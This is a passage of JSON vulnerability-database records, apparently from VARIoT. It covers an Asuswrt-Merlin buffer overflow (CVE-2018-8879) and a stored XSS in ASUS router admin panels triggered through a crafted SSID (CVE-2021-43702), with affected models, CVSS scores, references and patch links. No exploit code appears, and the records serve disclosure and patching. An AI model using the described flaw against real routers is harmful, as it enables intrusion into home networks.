              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "RT-AC66U",
            "trust": 0.8,
            "url": "https://www.asus.com/Networking/RTAC66U/HelpDesk_BIOS"
          },
          {
            "title": "Patch for ASUS Asuswrt-Merlin blocking.asp buffer overflow vulnerability",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchInfo/show/197547"
          },
          {
            "title": "ASUS Asuswrt-Merlin Buffer error vulnerability fix",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=104042"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-02713"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-016158"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201911-1254"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-787",
            "trust": 1.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-016158"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-8879"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.2,
            "url": "https://pagedout.institute/download/pagedout_001_beta1.pdf"
          },
          {
            "trust": 1.6,
            "url": "https://www.asus.com/networking/rtac66u/helpdesk_bios"
          },
          {
            "trust": 1.4,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2018-8879"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-8879"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-02713"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-016158"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201911-1254"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-8879"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-02713"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-016158"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201911-1254"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-8879"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2019-11-21T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2020-02713"
          },
          {
            "date": "2019-12-05T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2018-016158"
          },
          {
            "date": "2019-11-21T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201911-1254"
          },
          {
            "date": "2019-11-21T16:15:11.720000",
            "db": "NVD",
            "id": "CVE-2018-8879"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2020-02-18T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2020-02713"
          },
          {
            "date": "2019-12-05T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2018-016158"
          },
          {
            "date": "2020-07-30T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201911-1254"
          },
          {
            "date": "2024-11-21T04:14:30.903000",
            "db": "NVD",
            "id": "CVE-2018-8879"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201911-1254"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Asuswrt-Merlin Firmware out-of-bounds vulnerability",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-016158"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "buffer error",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201911-1254"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202207-0160

    Vulnerability from variot - Updated: 2024-08-14 15:27

    ASUS RT-A88U 3.0.0.4.386_45898 is vulnerable to Cross Site Scripting (XSS). The ASUS router admin panel does not sanitize the WiFI logs correctly, if an attacker was able to change the SSID of the router with a custom payload, they could achieve stored XSS on the device. ASUS RT-A88U is a wireless router from ASUS (ASUS) in Taiwan

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202207-0160",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "zenwifi xd4s",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.386.46061"
          },
          {
            "model": "zenwifi ac mini",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.386.46061"
          },
          {
            "model": "rt-ac58u",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.386.46061"
          },
          {
            "model": "rt-ax86u",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.386.46061"
          },
          {
            "model": "rt-ac87u",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.386.46061"
          },
          {
            "model": "rt-acrh13",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.386.46061"
          },
          {
            "model": "rt-n12vp b1",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.386.46061"
          },
          {
            "model": "rt-ac66r",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.386.46061"
          },
          {
            "model": "rt-ac2400",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.386.46061"
          },
          {
            "model": "zenwifi pro et12",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.386.46061"
          },
          {
            "model": "rt-ac5300",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.386.46061"
          },
          {
            "model": "rt-n12e c1",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.386.46061"
          },
          {
            "model": "rt-ac55u",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.386.46061"
          },
          {
            "model": "rt-ac68uf",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.386.46061"
          },
          {
            "model": "zenwifi xd6",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.386.46061"
          },
          {
            "model": "rt-ac1300g\\+",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.386.46061"
          },
          {
            "model": "rt-ac2200",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.386.46061"
          },
          {
            "model": "rt-ac66u\\+",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.386.46061"
          },
          {
            "model": "rt-ac56s",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.386.46061"
          },
          {
            "model": "rt-ax82u",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.386.46061"
          },
          {
            "model": "rt-ac1300uhp",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.386.46061"
          },
          {
            "model": "rt-n12hp b1",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.386.46061"
          },
          {
            "model": "rt-ac85u",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.386.46061"
          },
          {
            "model": "rt-ac1200g",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.386.46061"
          },
          {
            "model": "tuf gaming ax3000 v2",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.386.46061"
          },
          {
            "model": "rt-ac55uhp",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.386.46061"
          },
          {
            "model": "rt-ac1750 b1",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.386.46061"
          },
          {
            "model": "rt-n14uhp",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.386.46061"
          },
          {
            "model": "rt-ac68u",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.386.46061"
          },
          {
            "model": "rt-ac3100",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.386.46061"
          },
          {
            "model": "zenwifi pro xt12",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.386.46061"
          },
          {
            "model": "rt-ac51u",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.386.46061"
          },
          {
            "model": "zenwifi et8",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.386.46061"
          },
          {
            "model": "rt-ax92u",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.386.46061"
          },
          {
            "model": "rt-ac66w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.386.46061"
          },
          {
            "model": "rt-ac66u",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.386.46061"
          },
          {
            "model": "rt-ax68u",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.386.46061"
          },
          {
            "model": "rt-ax58u",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.386.46061"
          },
          {
            "model": "rt-ax55",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.386.46061"
          },
          {
            "model": "rt-ac3200",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.386.46061"
          },
          {
            "model": "zenwifi xt9",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.386.46061"
          },
          {
            "model": "rog rapture gt-ac5300",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.386.46061"
          },
          {
            "model": "rt-ac1750",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.386.46061"
          },
          {
            "model": "rt-ac68r",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.386.46061"
          },
          {
            "model": "rt-ax3000",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.386.46061"
          },
          {
            "model": "rog rapture gt-ax11000",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.386.46061"
          },
          {
            "model": "rt-ac56u",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.386.46061"
          },
          {
            "model": "rt-ax89x",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.386.46061"
          },
          {
            "model": "zenwifi xd5",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.386.46061"
          },
          {
            "model": "zenwifi ax hybrid",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.386.46061"
          },
          {
            "model": "rt-ac52u b1",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.386.46061"
          },
          {
            "model": "rt-ac1900",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.386.46061"
          },
          {
            "model": "rt-n12\\+ b1",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.386.46061"
          },
          {
            "model": "rt-ac1200g\\+",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.386.46061"
          },
          {
            "model": "rt-n66w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.386.46061"
          },
          {
            "model": "zenwifi ax mini",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.386.46061"
          },
          {
            "model": "rt-ac1200e",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.386.46061"
          },
          {
            "model": "rt-ac2900",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.386.46061"
          },
          {
            "model": "rt-ac53",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.386.46061"
          },
          {
            "model": "rt-ac85p",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.386.46061"
          },
          {
            "model": "rt-n19",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.386.46061"
          },
          {
            "model": "rt-ac68w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.386.46061"
          },
          {
            "model": "rt-ac1200gu",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.386.46061"
          },
          {
            "model": "rt-ax56u",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.386.46061"
          },
          {
            "model": "rt-ac51u\\+",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.386.46061"
          },
          {
            "model": "rt-ax88u",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.386.46061"
          },
          {
            "model": "rt-n12d1",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.386.46061"
          },
          {
            "model": "rt-n66u",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.386.46061"
          },
          {
            "model": "rt-ac65p",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.386.46061"
          },
          {
            "model": "rt-ac1900u",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.386.46061"
          },
          {
            "model": "zenwifi ax",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.386.46061"
          },
          {
            "model": "4g-ac68u",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.386.46061"
          },
          {
            "model": "zenwifi ac",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.386.46061"
          },
          {
            "model": "rt-ac57u",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.386.46061"
          },
          {
            "model": "rt-n18u",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.386.46061"
          },
          {
            "model": "rt-ac68p",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.386.46061"
          },
          {
            "model": "rt-ac86u",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.386.46061"
          },
          {
            "model": "rt-ac65u",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.386.46061"
          },
          {
            "model": "rt-ac66u b1",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.386.46061"
          },
          {
            "model": "4g-ac53u",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.386.46061"
          },
          {
            "model": "rt-ac2600",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.386.46061"
          },
          {
            "model": "rt-ac87r",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.386.46061"
          },
          {
            "model": "rt-acrh17",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.386.46061"
          },
          {
            "model": "tuf gaming ax5400",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.386.46061"
          },
          {
            "model": "rt-n66r",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.386.46061"
          },
          {
            "model": "rt-n12e b1",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.386.46061"
          },
          {
            "model": "rog rapture gt-ac2900",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.386.46061"
          },
          {
            "model": "rt-ac1200hp",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.386.46061"
          },
          {
            "model": "rt-ac1900p",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.386.46061"
          },
          {
            "model": "rt-ac56r",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.386.46061"
          },
          {
            "model": "rt-ac88u",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.386.46061"
          },
          {
            "model": "rt-ac1200",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.386.46061"
          },
          {
            "model": "rt-n66c1",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.386.46061"
          },
          {
            "model": "rt-a88u 3.0.0.4.386 45898",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2022-58229"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-43702"
          }
        ]
      },
      "cve": "CVE-2021-43702",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 3.5,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 6.8,
                "id": "CVE-2021-43702",
                "impactScore": 2.9,
                "integrityImpact": "PARTIAL",
                "severity": "LOW",
                "trust": 1.1,
                "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
                "version": "2.0"
              },
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "NONE",
                "baseScore": 4.3,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 8.6,
                "id": "CNVD-2022-58229",
                "impactScore": 2.9,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 0.6,
                "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 9.0,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 2.3,
                "id": "CVE-2021-43702",
                "impactScore": 6.0,
                "integrityImpact": "HIGH",
                "privilegesRequired": "LOW",
                "scope": "CHANGED",
                "trust": 1.0,
                "userInteraction": "REQUIRED",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H",
                "version": "3.1"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2021-43702",
                "trust": 1.0,
                "value": "CRITICAL"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2022-58229",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202207-389",
                "trust": 0.6,
                "value": "CRITICAL"
              },
              {
                "author": "VULMON",
                "id": "CVE-2021-43702",
                "trust": 0.1,
                "value": "LOW"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2022-58229"
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-43702"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202207-389"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-43702"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "ASUS RT-A88U 3.0.0.4.386_45898 is vulnerable to Cross Site Scripting (XSS). The ASUS router admin panel does not sanitize the WiFI logs correctly, if an attacker was able to change the SSID of the router with a custom payload, they could achieve stored XSS on the device. ASUS RT-A88U is a wireless router from ASUS (ASUS) in Taiwan",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2021-43702"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2022-58229"
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-43702"
          }
        ],
        "trust": 1.53
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2021-43702",
            "trust": 2.3
          },
          {
            "db": "CNVD",
            "id": "CNVD-2022-58229",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202207-389",
            "trust": 0.6
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-43702",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2022-58229"
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-43702"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202207-389"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-43702"
          }
        ]
      },
      "id": "VAR-202207-0160",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2022-58229"
          }
        ],
        "trust": 1.2372652696875
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2022-58229"
          }
        ]
      },
      "last_update_date": "2024-08-14T15:27:14.485000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Patch for ASUS RT-A88U Cross-Site Scripting Vulnerability",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchInfo/show/345646"
          },
          {
            "title": "ASUS RT-A88U Fixes for cross-site scripting vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=200692"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2022-58229"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202207-389"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-79",
            "trust": 1.0
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2021-43702"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.3,
            "url": "https://www.kroll.com/en/insights/publications/cyber/cve-2021-43702-from-discovery-to-patch"
          },
          {
            "trust": 1.7,
            "url": "https://www.asus.com/uk/networking-iot-servers/wifi-routers/asus-wifi-routers/rt-ac88u/"
          },
          {
            "trust": 0.6,
            "url": "https://cxsecurity.com/cveshow/cve-2021-43702/"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/79.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2022-58229"
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-43702"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202207-389"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-43702"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2022-58229"
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-43702"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202207-389"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-43702"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2022-08-16T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2022-58229"
          },
          {
            "date": "2022-07-05T00:00:00",
            "db": "VULMON",
            "id": "CVE-2021-43702"
          },
          {
            "date": "2022-07-05T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202207-389"
          },
          {
